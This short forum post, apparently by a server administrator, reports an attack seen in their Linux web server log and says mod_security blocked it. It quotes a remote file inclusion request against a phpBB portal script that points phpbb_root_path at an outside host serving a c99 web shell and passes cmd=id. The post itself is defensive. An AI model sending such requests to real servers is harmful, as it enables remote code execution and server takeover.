I seen this in my logs of my Dedicated Linux server for my site.
GET /portal///includes/functions_portal.php?phpbb_root_path=http://www.festivalrilke.ch/files/upload/c99shellb16.txt?&cmd=id HTTP/1.1
If you click the URL within the GET command you'll see an elaborate script that is trying to be executed. Thank god I have mod_security installed and it was able to block/deny the phpbb_root_path command from being executed.